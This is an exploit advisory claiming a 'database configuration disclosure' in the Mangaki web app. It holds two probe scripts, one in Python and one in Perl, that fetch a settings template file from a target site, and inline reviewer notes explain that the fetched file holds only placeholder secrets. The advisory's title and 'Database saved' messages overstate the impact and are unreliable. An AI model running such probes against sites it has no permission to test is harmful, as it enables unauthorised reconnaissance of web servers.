1###########################################################################
2
3# Exploit Title : Mangaki 0.6.1 Database Configuration Disclosure
4# Author [ Discovered By ] : KingSkrupellos
5# Team : Cyberizm Digital Security Army
6# Date : 09/06/2019
7# Vendor Homepage : mangaki.fr
8# Software Download Link : github.com/mangaki/mangaki/archive/master.zip
9# Software Version : 0.6.1 and lower versions
10# Tested On : Windows and Linux
11# Category : WebApps
12# Exploit Risk : Medium
13# Vulnerability Type :
14CWE-16 [ Configuration ]
15CWE-200 [ Information Exposure ]
16CWE-538 [ File and Directory Information Exposure ]
17# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
18# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
19# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
20# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
21acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
22# Acunetix Reference Link About : [ Possible Database Backup File ]
23acunetix.com/vulnerabilities/web/possible-database-backup/
24# Source : cxsecurity.com/issue/WLB-2019060051
25
26###########################################################################
27
28# Information about Software :
29****************************
30Mangaki is an anime & manga recommendation website.
31
32###########################################################################
33
34# Impact :
35***********
36* The product stores sensitive information in files or directories that are accessible
37to actors outside of the intended control sphere.
38* An information exposure is the intentional or unintentional disclosure of information
39to an actor that is not explicitly authorized to have access to that information.
40* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of
41MySQL over the World Wide Web. It can be used to dump a database or a collection of
42databases for backup or transfer to another SQL server (not necessarily a MySQL server).
43The dump typically contains SQL statements to create the table, populate it, or both.
44This file contains a phpMyAdmin SQL dump. This information is highly sensitive and
45should not be found on a production system.
46* It looks like this file contains a database backup/dump.
47Acunetix inferred this filename from the domain name. A database backup contains a record of the
48 table structure and/or the data from a database and is usually in the form of a list of SQL statements.
49A database backup is most often used for backing up a database so that its contents can be restored
50in the event of data loss. This information is highly sensitive and should never be found on a production system.
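51Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible
52to the web server. As a workaround, you could restrict access to this file. Note that the two files quoted below are a
settings template with placeholder values (SECRET_KEY = CHANGE_ME, DB_PASSWORD = YOUR_POSTGRE_PASSWORD) and a
configuration whose values are test defaults (SECRET_KEY = test, DB_NAME = circle_test); the file that needs this
protection is the filled-in copy of the template that holds the real SECRET_KEY and DB_PASSWORD.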
53
54###########################################################################
55
56File :
57******
58/mangaki/settings.template.ini
59
60/mangaki/mangaki/settings.template.ini
61
62Information :
63*************
64[debug]
65 DEBUG = True
66 # Debug JavaScript frontend
67 DEBUG_VUE_JS = True
68
69[email]
70 EMAIL_BACKEND = django.core.mail.backends.console.EmailBackend
71
72[secrets]
73# Choose your own password or generate it with `pwgen -s -c 60 1`
74 SECRET_KEY = CHANGE_ME
75 DB_PASSWORD = YOUR_POSTGRE_PASSWORD
76
77#[deployment]
78# MEDIA_ROOT = <base directory for media files>
79# STATIC_ROOT = <base directory for static files>
80# DATA_ROOT = <base directory for data files: snapshots of algorithms, side information>
81
82#[hosts]
83# ALLOWED_HOSTS = <see https://docs.djangoproject.com/fr/1.10/ref/settings/#allowed-hosts>
84
85#[mal] # Used to get posters and user lists
86# MAL_USER =
87# MAL_USER_AGENT =
88
89#[anidb]
90# ANIDB_CLIENT =
91# ANIDB_VERSION = 1
92
93#[pgsql]
94# DB_HOST = <defaults to 127.0.0.1>
95# DB_NAME = <defaults to mangaki>
96# DB_USER = <defaults to django>
97
98#[sentry] (not required, only if you want to enable Sentry support)
99# DSN = <sentry DSN>
100
101#[secrets]
102# MAL_PASS =
103
104#[smtp]
105# EMAIL_HOST =
106# EMAIL_HOST_PASSWORD =
107# EMAIL_HOST_USER =
108# EMAIL_PORT =
109# EMAIL_SSL_CERTFILE =
110# EMAIL_SSL_KEYFILE =
111# EMAIL_TIMEOUT =
112# EMAIL_USE_SSL =
113# EMAIL_USE_TLS =
114
115raw.githubusercontent.com/mangaki/mangaki/master/mangaki/settings.template.ini
116
117File :
118*******
119/.circle_mangaki_settings.ini
120
121Information :
122*************
123[debug]
124DEBUG = True
125
126[secrets]
127SECRET_KEY = test
128DB_PASSWORD = ""
129
130[pgsql]
131DB_NAME = circle_test
132DB_USER = mangaki
133
134[email]
135EMAIL_BACKEND = django.core.mail.backends.dummy.EmailBackend
136
137raw.githubusercontent.com/mangaki/mangaki/master/.circle_mangaki_settings.ini
138
139###########################################################################
140
141# Database Disclosure Information Exposure Exploit 1 :
142***********************************************
143#!/usr/bin/python
# Reviewer notes. Only comments are added; the listing is otherwise unchanged,
# including the leading numbers, which look like the paste page's gutter numbers
# fused to each line.
#
# Purpose: flat Python 2 script (urllib2, raw_input, print statement). It reads a
# base URL from the terminal, appends the fixed path held in `disc`, sends one GET
# request and prints the regex matches found in the response body.
#
# What is actually requested: the path is the settings *template* quoted earlier on
# this page, whose secret values are placeholders (CHANGE_ME, YOUR_POSTGRE_PASSWORD).
# A response therefore only shows that the deployment serves its source tree; the
# sensitive file would be the filled-in copy of that template.
#
# Defender view: the probe is a single GET for /mangaki/settings.template.ini. The
# Request is built without headers, so urllib2 sends its default User-Agent
# (Python-urllib/<version>). Keeping the source tree and settings files outside the
# directory the web server serves removes the exposure.
144import string
# `string` is imported but never used in this listing.
145import re
146from urllib2 import Request, urlopen
# Fixed path appended to whatever base URL the operator types.
147disc = "/mangaki/settings.template.ini"
148url = raw_input ("URL: ")
# Plain concatenation: no scheme check and no normalisation of the typed value.
149req = Request(url+disc)
# No timeout and no try/except: an HTTP or network error ends the script with a traceback.
150rta = urlopen(req)
151print "Result"
152html = rta.read()
# The pattern looks for the literal text "resources". None of the keys in the
# template quoted on this page contain it, so for that content findall() returns an
# empty list and the next line prints "[]".
153rdo = str(re.findall("resources.*=*", html))
154print rdo
# Bare name, not a call: this line does nothing; the script ends because it is the last line.
155exit
156
157###########################################################################
158
159# Database Disclosure Information Exposure Exploit 2 :
160***********************************************
161#!/usr/bin/perl -w
# Reviewer notes. Only comments are added; the listing is otherwise unchanged,
# including the leading numbers, which look like the paste page's gutter numbers
# fused to each line.
#
# Purpose: takes a host and a path from the command line, builds
# http://<host><path>mangaki/settings.template.ini, sends one GET with
# LWP::UserAgent and writes the response body to a fixed local file.
#
# What is actually fetched: the settings *template* quoted earlier on this page,
# whose secret values are placeholders (CHANGE_ME, YOUR_POSTGRE_PASSWORD). The
# "Database saved" message below is therefore misleading: no database content is
# involved, only the body returned for that .ini path.
#
# Defender view: the probe is a single GET for a path ending in
# mangaki/settings.template.ini. No agent string is set, so LWP::UserAgent sends its
# default User-Agent (libwww-perl/<version>). Keeping the source tree and settings
# files outside the directory the web server serves removes the exposure.
#
# Code quality: warnings are enabled by -w, but there is no `use strict`, and
# $TargetIP, $path and $File are undeclared package globals.
162# Author : KingSkrupellos
163# Team : Cyberizm Digital Security Army
164
# LWP::Simple is loaded but none of its functions are called in this listing.
165use LWP::Simple;
166use LWP::UserAgent;
167
# `cls` and `color a` are Windows console commands. The middle call hands the title
# string to the shell as a command name, which fails unless a program called
# "Mangaki" exists; presumably a banner was intended.
168system('cls');
169system('Mangaki 0.6.1 Database Configuration Disclosure');
170system('color a');
171
172
# Fewer than two arguments: print the usage text and stop.
173if(@ARGV < 2)
174{
175print "[-]How To Use\n\n";
# `&help;` calls the sub defined just below; the & form ignores its empty prototype
# and passes the current @_ through.
176&help; exit();
177}
178sub help()
179{
180print "[+] usage1 : perl $0 site.com /path/ \n";
181print "[+] usage2 : perl $0 localhost / \n";
182}
# A third command-line argument is read into $File here and overwritten two lines
# later, so it has no effect.
183($TargetIP, $path, $File,) = @ARGV;
184
185$File="mangaki/settings.template.ini";
# Scheme is hard-coded to plain http; host and path are concatenated unvalidated.
186my $url = "http://" . $TargetIP . $path . $File;
187print "\n Wait Please Dear Hacker!!! \n\n";
188
189my $useragent = LWP::UserAgent->new();
# get() returns the response object (named $request here). :content_file tells LWP
# to write the body to the given path; the script does not create D:/mangaki itself.
190my $request = $useragent->get($url,":content_file" => "D:/mangaki/settings.template.ini");
191
# Success means only that the server answered the GET with a success status.
192if ($request->is_success)
193{
194print "[+] $url Exploited!\n\n";
195print "[+] Database saved to D:/mangaki/settings.template.ini\n";
196exit();
197}
198else
199{
# status_line is the HTTP status code and message from the response.
200print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
201exit();
202}
203
204###########################################################################
205
206# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
207
208###########################################################################